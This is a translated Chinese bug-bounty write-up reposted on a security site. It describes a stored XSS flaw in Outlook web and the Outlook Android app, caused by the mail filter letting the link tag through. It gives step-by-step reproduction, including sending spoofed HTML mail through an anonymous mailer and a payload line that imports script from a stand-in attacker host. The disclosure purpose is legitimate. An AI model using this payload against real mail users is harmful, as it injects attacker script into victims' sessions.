大家好,这是我第一次写漏洞文章,也是我发现的第一个Outlook漏洞。
在很多网络消息服务中,例如Gmail、Outlook、Yahoo等,都允许接受并渲染电子邮件中的HTML内容(Content-Type: text/html),但同时也会进行安全限制,只允许A
、H1
、img
等标签。
而当我测试Outlook中的安全过滤机制时,发现link
标签并不会被过滤。这就让我有机可乘,成功引入了外部JS代码,实现了弹框。
复现步骤
-
进入网站
[https://emkei.cz/](https://emkei.cz/)
,这个网站的能直接设置发送的电子邮件的内容的类型。 -
随机往邮件主题、发件人和发件地址填入字符。
-
往收件人地址填入你需要测试的电子邮件地址。
-
将
Content-Type
设定为text/html
。 -
邮件正文填入
<link rel=import href=[https://Evilcom/filepayload](https://Evilcom/filepayload)>
,点击提交。 -
登入收件电子邮箱,点击查看消息,payload就会成功执行!
以下为PoC视频地址:
https://youtu.be/khsLfQwy1ik
Android版漏洞
在第一个漏洞被修复后,我下载了对应的Android版本,尝试使用相同的方法进行攻击。结果发现手机端应用的缺陷更大,直接插入了payload,成功弹框。
感谢你的阅读!
本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/3230.html 来源:https://medium.com/@elmrhassel/xss-stored-on-outlook-web-outlook-android-app-ad4bd46b8823
来源:freebuf.com 2019-11-29 17:35:06 by: 白帽汇
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册